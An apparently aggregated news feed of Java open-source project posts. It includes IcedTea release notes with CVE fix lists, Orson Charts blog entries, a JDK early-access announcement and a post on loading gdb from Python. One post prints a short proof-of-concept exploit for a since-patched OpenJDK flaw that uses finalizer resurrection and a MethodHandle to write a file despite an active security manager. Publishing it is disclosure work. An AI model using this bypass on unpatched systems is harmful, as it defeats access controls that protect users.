GNU Classpath

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative ... [More] virtual machines and architectures beyond those supported by OpenJDK. This release updates our OpenJDK 6 support in the 1.11.x series with the January 2014 security errata and a number of bug fixes. This is the final update for the 1.11.x series (1.11.15), following the release of the 1.13.x series (see the release policy). Users are advised to migrate to the 1.13.x series as soon as possible. If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome. Full details of the release can be found below. What’s New? New in release 1.11.15 (2014-01-21) Security fixes S6727821: Enhance JAAS Configuration S7068126, CVE-2014-0373: Enhance SNMP status S8010935: Better XML handling S8011786, CVE-2014-0368: Better applet networking S8021257, CVE-2013-5896: com.sun.corba.se.** should be on restricted package list S8022904: Enhance JDBC Parsers S8022927: Input validation for byte/endian conversions S8022935: Enhance Apache resolver classes S8022945: Enhance JNDI implementation classes S8023057: Enhance start up image display S8023069, CVE-2014-0411: Enhance TLS connections S8023245, CVE-2014-0423: Enhance Beans decoding S8023301: Enhance generic classes S8023672: Enhance jar file validation S8024306, CVE-2014-0416: Enhance Subject consistency S8024530: Enhance font process resilience S8024867: Enhance logging start up S8025014: Enhance Security Policy S8025018, CVE-2014-0376: Enhance JAX-P set up S8025026, CVE-2013-5878: Enhance canonicalization S8025034, CVE-2013-5907: Improve layout lookups S8025448: Enhance listening events S8025758, CVE-2014-0422: Enhance Naming management S8025767, CVE-2014-0428: Enhance IIOP Streams S8026172: Enhance UI Management S8026176: Enhance document printing S8026193, CVE-2013-5884: Enhance CORBA stub factories S8026204: Enhance auth login contexts S8026417, CVE-2013-5910: Enhance XML canonicalization S8027201, CVE-2014-0376: Enhance JAX-P set up Backports S6763340: memory leak in com.sun.corba.se.* classes S6873605: Missing finishedDispatch() call in ORBImpl causes test failures after 5u20 b04 S6893617: JDK 6 CNCtx always uses the default ORB S6980681: CORBA deadlock in Java SE believed to be related to CR 6238477 S6995424: Eliminate dependency to a deprecated API com.sun.security.auth.PolicyFile S7162902: Umbrella port of a number of corba bug fixes from JDK 6 to jdk7u/8 S8026826: JDK 7 fix for 8010935 broke the build S8027837: JDK-8021257 causes CORBA build failure on emdedded platforms Bug fixes D729448: 32-bit alignment on mips and mipsel Fail if a C and C++ compiler are not detected. Only copy tz.properties if the destination directory exists. Fix GenerateBreakIteratorData tool so that crashes have stack traces. Fix path in nss-not-enabled-config.patch. SystemTap support: Add garbage collection dtrace/SystemTap probes to HotSpot. The tarballs can be downloaded from: http://icedtea.classpath.org/download/source/icedtea6-1.11.15.tar.gz or: http://icedtea.classpath.org/download/source/icedtea6-1.11.15.tar.xz We provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so. The tarballs are accompanied by digital signatures available at: http://icedtea.classpath.org/download/source/icedtea6-1.11.15.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea6-1.11.15.tar.xz.sig These are produced using my public key. See details below. PGP Key: 248BDC07 (https://keys.indymedia.org/) Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07 SHA256 checksums: 20c0028148fb39bdd6effedb0f3d7d2cf08fc5dc7b65be5e36bccd6771a33e1f icedtea6-1.11.15.tar.gz 39b0873bb1a4168376eb3b382ad22c8718228237bb438529abffe269e06e29a6 icedtea6-1.11.15.tar.gz.sig 4bd083ceb51da976b6f135780067cee8c84908db0143482ab743101bd0a2458a icedtea6-1.11.15.tar.xz ca8639bfc41bec784cf19963d63ac95e779dd21299cd34b16e2ceed076f06d90 icedtea6-1.11.15.tar.xz.sig The following people helped with these releases: Lukas Berk (garbage collection probe support) Andrew Hughes (all other backports & fixes & release management) Aurelien Jarno (D729448) Omair Majid (security backports & NSS config fix) We would also like to thank the bug reporters and testers! To get started: $ tar xzf icedtea6-1.11.15.tar.gz or: $ tar x -I xz -f icedtea6-1.11.15.tar.xz then: $ mkdir icedtea-build $ cd icedtea-build $ ../icedtea6-1.11.15/configure $ make Full build requirements and instructions are available in the INSTALL file. Happy hacking! [Less]

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative ... [More] virtual machines and architectures beyond those supported by OpenJDK. This release synchronises our OpenJDK 7 support in the 2.4.x series with the upstream u51 b31 tag, fixes the bootstrap issues with the 2.4.4 release and adds in a couple of recent bug fixes. If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome. Full details of the release can be found below. What’s New? New in release 2.4.5 (2014-01-29) Backports S8015976: OpenJDK part of bug JDK-8015812 [TEST_BUG] Tests have conflicting test descriptions S8022698: javax/script/GetInterfaceTest.java fails since 7u45 b04 with -agentvm option S8022868: missing codepage Cp290 at java runtime S8023310: Thread contention in the method Beans.IsDesignTime() S8024461: [macosx] Java crashed on mac10.9 for swing and 2d function manual test S8025679: Increment minor version of HSx for 7u51 and initialize the build number S8026037: [TESTBUG] sun/security/tools/jarsigner/warnings.sh test fails on Solaris S8026304: jarsigner output bad grammar S8026772: test/sun/util/resources/TimeZone/Bug6317929.java failing S8026887: Make issues due to failed large pages allocations easier to debug S8027204: Revise the update of 8026204 and 8025758 S8027224: test regression – ClassNotFoundException S8027370: Support tzdata2013h S8027378: Two closed/javax/xml/8005432 fails with jdk7u51b04 S8027787: 7u51 l10n resource file translation update 1 S8027837: JDK-8021257 causes CORBA build failure on emdedded platforms S8027943: serial version of com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl changed in 7u45 S8027944: Increment hsx 24.51 build to b02 for 7u51-b07 S8028057: Modify jarsigner man page documentation to document CCC 8024302: Clarify jar verifications S8028090: reverting change – changeset pushed with incorrect commit message, linked to wrong issue S8028111: XML readers share the same entity expansion counter S8028215: ORB.init fails with SecurityException if properties select the JDK default ORB S8028293: Check local configuration for actual ephemeral port range S8028382: Two javax/xml/8005433 tests still fail after the fix JDK-8028147 S8028453: AsynchronousSocketChannel.connect() requires SocketPermission due to bind to local address (win) S8028823: java/net/Makefile tabs converted to spaces S8029038: Revise fix for XML readers share the same entity expansion counter S8029842: Increment hsx 24.51 build to b03 for 7u51-b11 Bug fixes Fix broken bootstrap build by updating ecj-multicatch.patch PR1653: Support ppc64le via Zero PR1654: ppc32 needs a larger ThreadStackSize to build RH1015432: java-1.7.0-openjdk: Fails on PPC with StackOverflowError RH910107: fail to load PC/SC library The tarball can be downloaded from: http://icedtea.classpath.org/download/source/icedtea-2.4.5.tar.gz or: http://icedtea.classpath.org/download/source/icedtea-2.4.5.tar.xz For the first time, we provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so. The tarballs are accompanied by digital signatures available at: http://icedtea.classpath.org/download/source/icedtea-2.4.5.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea-2.4.5.tar.xz.sig These are produced using my public key. See details below. PGP Key: 248BDC07 (https://keys.indymedia.org/) Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07 SHA256 checksums: 10c08eeffaa0602b23cb957a2595a2ad3ab474cbe47b12743bbdd79037d5883d icedtea-2.4.5.tar.gz 5e3d848231193010339ecda3468a512ddf38802fdc1f9942f49c3a380816175e icedtea-2.4.5.tar.gz.sig d3f96413c77efa400947d1c5e85bb55fdb0c36d0adb8802f0ca2b283855d305b icedtea-2.4.5.tar.xz ad5941a217db86f5ce7197e94ca15dbfeeeb0fdaca9158469b6f88ea8ca8d99f icedtea-2.4.5.tar.xz.sig The following people helped with these releases: Severin Gehwolf (RH910107) Andrew Hughes (OpenJDK synchronisation, bootstrap fix & release management) Matthias Klose (PR1653) Chris Phillips (PR1654, RH1015432) We would also like to thank the bug reporters and testers! To get started: $ tar xzf icedtea-2.4.5.tar.gz or: $ tar x -I xz -f icedtea-2.4.5.tar.xz then: $ mkdir icedtea-build $ cd icedtea-build $ ../icedtea-2.4.5/configure $ make Full build requirements and instructions are available in the INSTALL file. Happy hacking! [Less]

This week I've taken Google's Dart programming language by the horns and ported Orson Charts (or at least large chunks of it) to “the browser”. I'm only going to show you a screenshot on this blog, so if you want to see this “live” please click the ... [More] image (or go to http://www.object-refinery.com/orsoncharts/dart/poc.html)...and then tell me which browsers this is broken on. In fact I tested it on Chrome, Safari and Firefox on my laptop, so I think it should work for a lot of people. The implementation renders charts to a canvas element, and performance is good considering that the 3D rendering is done in software (Javascript, no less). In case it is not obvious, you can rotate the charts by a mouse drag (or touch on mobile devices) and zoom by mouse wheel. There is no pinch zoom for mobile yet, but it will be done. There's still polishing to do on this code, I only started working on the port on Monday (5 days ago), but eventually it will be released as a product alongside the Java and Android editions of Orson Charts. If you have any questions, don't hesitate to contact me ([email protected]). And have a good weekend! [Less]

Fancy trying the OpenJDK PPC port? Support is now available for using its HotSpot repository in place of the IcedTea one when building IcedTea 2.x: $ hg clone http://icedtea.classpath.org/hg/icedtea7/ $ cd icedtea7 $ ./autogen.sh $ ./configure --with-hotspot-build=ppc $ make Enjoy!

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative ... [More] virtual machines and architectures beyond those supported by OpenJDK. This release updates our OpenJDK 6 support in the 1.12.x and 1.13.x series with the January 2014 security errata and a number of bug fixes. An update will follow for the 1.11.x series (1.11.15), but this will be the final update for this release series, following the release of the 1.13.x series (see the release policy). Users are advised to migrate to either the 1.12.x or 1.13.x series as soon as possible. If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome. Full details of the release can be found below. What’s New? New in release 1.13.1 (2014-01-22) Security fixes S6727821: Enhance JAAS Configuration S7068126, CVE-2014-0373: Enhance SNMP statuses S8010935: Better XML handling S8011786, CVE-2014-0368: Better applet networking S8021257, CVE-2013-5896: com.sun.corba.se.** should be on restricted package list S8021271, CVE-2014-0408: Better buffering in ObjC code S8022904: Enhance JDBC Parsers S8022927: Input validation for byte/endian conversions S8022935: Enhance Apache resolver classes S8022945: Enhance JNDI implementation classes S8023057: Enhance start up image display S8023069, CVE-2014-0411: Enhance TLS connections S8023245, CVE-2014-0423: Enhance Beans decoding S8023301: Enhance generic classes S8023672: Enhance jar file validation S8024306, CVE-2014-0416: Enhance Subject consistency S8024530: Enhance font process resilience S8024867: Enhance logging start up S8025014: Enhance Security Policy S8025018, CVE-2014-0376: Enhance JAX-P set up S8025026, CVE-2013-5878: Enhance canonicalization S8025034, CVE-2013-5907: Improve layout lookups S8025448: Enhance listening events S8025758, CVE-2014-0422: Enhance Naming management S8025767, CVE-2014-0428: Enhance IIOP Streams S8026172: Enhance UI Management S8026176: Enhance document printing S8026193, CVE-2013-5884: Enhance CORBA stub factories S8026204: Enhance auth login contexts S8026417, CVE-2013-5910: Enhance XML canonicalization S8027201, CVE-2014-0376: Enhance JAX-P set up Import of OpenJDK6 b30 OJ24: Fix change summary generator OJ25: Remove @Override annotation added on interfaces by 2014/01/14 security fixes S6995424: Eliminate dependency to a deprecated API com.sun.security.auth.PolicyFile S8026826: JDK 7 fix for 8010935 broke the build S8027837: JDK-8021257 causes CORBA build failure on emdedded platforms Bug fixes Fix path in nss-not-enabled-config.patch. New in release 1.12.8 (2014-01-22) Security fixes S6727821: Enhance JAAS Configuration S7068126, CVE-2014-0373: Enhance SNMP statuses S8010935: Better XML handling S8011786, CVE-2014-0368: Better applet networking S8021257, CVE-2013-5896: com.sun.corba.se.** should be on restricted package list S8022904: Enhance JDBC Parsers S8022927: Input validation for byte/endian conversions S8022935: Enhance Apache resolver classes S8022945: Enhance JNDI implementation classes S8023057: Enhance start up image display S8023069, CVE-2014-0411: Enhance TLS connections S8023245, CVE-2014-0423: Enhance Beans decoding S8023301: Enhance generic classes S8023672: Enhance jar file validation S8024306, CVE-2014-0416: Enhance Subject consistency S8024530: Enhance font process resilience S8024867: Enhance logging start up S8025014: Enhance Security Policy S8025018, CVE-2014-0376: Enhance JAX-P set up S8025026, CVE-2013-5878: Enhance canonicalization S8025034, CVE-2013-5907: Improve layout lookups S8025448: Enhance listening events S8025758, CVE-2014-0422: Enhance Naming management S8025767, CVE-2014-0428: Enhance IIOP Streams S8026172: Enhance UI Management S8026176: Enhance document printing S8026193, CVE-2013-5884: Enhance CORBA stub factories S8026204: Enhance auth login contexts S8026417, CVE-2013-5910: Enhance XML canonicalization S8027201, CVE-2014-0376: Enhance JAX-P set up Backports S6995424: Eliminate dependency to a deprecated API com.sun.security.auth.PolicyFile S8026826: JDK 7 fix for 8010935 broke the build S8027837: JDK-8021257 causes CORBA build failure on emdedded platforms Bug fixes Fail if a C and C++ compiler are not detected. Fix path in nss-not-enabled-config.patch. SystemTap support: Ensure all patches are applied. The tarballs can be downloaded from: http://icedtea.classpath.org/download/source/icedtea6-1.12.8.tar.gz http://icedtea.classpath.org/download/source/icedtea6-1.13.1.tar.gz or: http://icedtea.classpath.org/download/source/icedtea6-1.12.8.tar.xz http://icedtea.classpath.org/download/source/icedtea6-1.13.1.tar.xz We provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so. The tarballs are accompanied by digital signatures available at: http://icedtea.classpath.org/download/source/icedtea6-1.12.8.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea6-1.12.8.tar.xz.sig http://icedtea.classpath.org/download/source/icedtea6-1.13.1.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea6-1.13.1.tar.xz.sig These are produced using my public key. See details below. PGP Key: 248BDC07 (https://keys.indymedia.org/) Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07 SHA256 checksums: c2ad74af29af774f778675d3fde952f4defebb2be44f565253d788e2e7af39d4 icedtea6-1.12.8.tar.gz dd6655700b5f68ba17480e62f13eb963ada63392d046bdf499eaf8f9f269526b icedtea6-1.12.8.tar.gz.sig cb584a3983e146b91f64c31594f8c599604fbc91fd3560503fdd65b04c6bfb7c icedtea6-1.12.8.tar.xz e973decd9dd68d7d84b57105abd5dba6cfe1431e052061e30d1ca137108f3a23 icedtea6-1.12.8.tar.xz.sig 3d4d0a02304884ddf9f2123c227501b77d318cffb1b912c204dbc992f66bd4b6 icedtea6-1.13.1.tar.gz f295b4373edb7a819a1a461e7c18ca447056b0618ee47a28377e98cf1118ac0d icedtea6-1.13.1.tar.gz.sig 5b2fe75660282889217fe997e9c8f9e70982f2c72fc2ca59db80e7da7380d7c1 icedtea6-1.13.1.tar.xz dd9ab64a6c21df07059d05065eedaa16bacb530c1a0961a614689426edd1cf5d icedtea6-1.13.1.tar.xz.sig The following people helped with these releases: Andrew Hughes (all other backports & fixes & release management) Omair Majid (security backports & NSS config fix) We would also like to thank the bug reporters and testers! To get started: $ tar xzf icedtea6-${release_version}.tar.gz or: $ tar x -I xz -f icedtea6-${release_version}.tar.xz then: $ mkdir icedtea-build $ cd icedtea-build $ ../icedtea6-${release_version}/configure $ make where ${release_version} is either 1.12.8 or 1.13.1. Full build requirements and instructions are available in the INSTALL file. Happy hacking! [Less]

Early Access builds of JDK 7u60 have been updated with Build b03. A list of changes is available. As the focus of the JDK 7u60 release is plain old bug fixes, this build contains bug fixes across the JDK code base.In addition, a new Early Access ... [More] build of JDK 8: Build b124 is now available for testing. This build updates HotSpot in JDK 8 to HotSpot 25 build 66 and fixes various issues, two of which were reported by Apache Maven and Groovy developers - thanks! If you find issues during your own testing of this build, please report a bug.An extensive list of changes since the previous build is linked off the download site. For developers making their own OpenJDK builds, and looking to compare their regression test results with others, JDK 8 b124 regression test results have been posted to the quality-discuss mailing list, as usual.As a new addition, starting with 7u60 b02, you can now also find the regression test results for JDK 7u early access builds being posted to that list, including those for the latest build.Happy testing! [Less]

Choosing a good color palette for charts is surprisingly hard. I largely ignored the issue for JFreeChart, assuming that developers would take the initiative and make use of the (very flexible) API to make their charts look great. That rarely ... [More] happened, because developers are too lazy or too busy or too stupid (or too smart in some cases) to venture far beyond the defaults given to them by an API. I understand this now, and will take steps. For Orson Charts, I decided I had to make more effort, so I started researching and experimenting. Progress was not linear, it has to be said, but I made a great break-through when I found this tool from médialab at Sciences Po in Paris (try it, it is amazing!): i want hue "Colors for data scientists. Generate and refine palettes of optimally distinct colors." I have not found any better tool to create color palettes for charts, and so I'm currently working on incorporating these into JFreeChart and Orson Charts. Here are some examples from the work in progress: Tell me what you think! If you need help to improve the data visualisation capabilities of your Java or Android applications, I can help you. Please see my consulting page. [Less]

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists. Now that it has been fixed in 7u51, here is a simple PoC exploit: import ... [More] java.lang.invoke.*; class test extends java.io.FileOutputStream {   static test t;   test() throws Exception {     super("");   }   protected void finalize() {     t = this;   }   public static void main(String[] args) throws Throwable {     MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",                         MethodType.methodType(void.class, String.class, boolean.class));     System.out.println(mh);     try { new test(); } catch (Exception _) { }     System.gc();     System.runFinalization();     mh.invokeExact(t, "oops.txt", false);   } } Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so. [Less]

Now that the core features are present in Orson Charts, my new 3D chart library for Java and Android, I'm putting efforts into the little features that will give the library greater polish. To give an example, in the upcoming version 1.2 release ... [More] I'll be adding label generators for pie section labels, category axis labels and legend item labels. These label generators will allow extra information to be included with chart labels based on templates. In the pie chart below, the percentage for each data item is shown in the legend: The code is straightforward (and similar in the case of category or xyz plots): PiePlot3D plot = (PiePlot3D) chart.getPlot(); plot.setLegendLabelGenerator(new StandardPieLabelGenerator(PERCENT_TEMPLATE)); For those that like to venture deeper into the API, the generators process label templates using java.util.Formatter, so there is a great deal of flexibility in the content and format of the labels. The generators also have access to the full dataset at the point that labels are created, so a custom generator can compute any data metric (min, max, mean etc) for inclusion in labels. We're also working with a client on a chart styling feature, so that you can easily choose a style or theme for your charts (or create your own). This should also make it into the version 1.2 release. I'll write a separate blog post about it later, because I've found some interesting and useful resources for colors and fonts...stay tuned. If you need help to improve the data visualisation capabilities of your Java or Android applications, I can help you. Please see my consulting page. [Less]

Occasionally I see questions about how to import gdb from the ordinary Python interpreter.  This turns out to be surprisingly easy to implement. First, a detour into PIE and symbol visibility. “PIE” stands for “Position Independent Executable”.  It ... [More] uses essentially the same approach as a shared library, except it can be applied to the executable.  You can easily build a PIE by compiling the objects with the -fPIE flag, and then linking the resulting executable with -pie.  Normally PIEs are used as a security feature, but in our case we’re going to compile gdb this way so we can have Python dlopen it, following the usual Python approach: we install it as _gdb.so and add a a module initialization function, init_gdb. (We actually name the module “_gdb“, because that is what the gdb C code creates; the “gdb” module itself is already plain Python that happens to “import _gdb“.) Why install the PIE rather than make a true shared library?  It is just more convenient — it doesn’t require a lot of configure and Makefile hacking, and it doesn’t slow down the build by forcing us to link gdb against a new library. Next, what about all those functions in gdb?  There are thousands of them… won’t they possibly cause conflicts at dlopen time?  Why yes… but that’s why we have symbol visibility.  Symbol visibility is an ELF feature that lets us hide all of gdb’s symbols from any dlopen caller.  In fact, I found out during this process that you can even hide main, as ld.so seems to ignore visibility bits for this function. Making this work is as simple as adding -fvisibility=hidden to our CFLAGS, and then marking our Python module initialization function with __attribute__((visibility("default"))).  Two notes here.  First, it’s odd that “default” means “public”; just one of those mysterious details.  Second, Python’s PyMODINIT_FUNC macro ought to do this already, but it doesn’t; there’s a Python bug. Those are the low-level mechanics.  At this point gdb is a library, albeit an unusual one that has a single entry point.  After this I needed a few tweaks to gdb’s startup process in order to make it work smoothly.  This too was no big deal.  Now I can write scripts from Python to do gdb things: #!/usr/bin/python import gdb gdb.execute('file ./install/bin/gdb') print 'sizeof = %d' % gdb.lookup_type('struct minimal_symbol').sizeof Then: $ python zz.py 72 Soon I’ll polish all the patches and submit this upstream. [Less]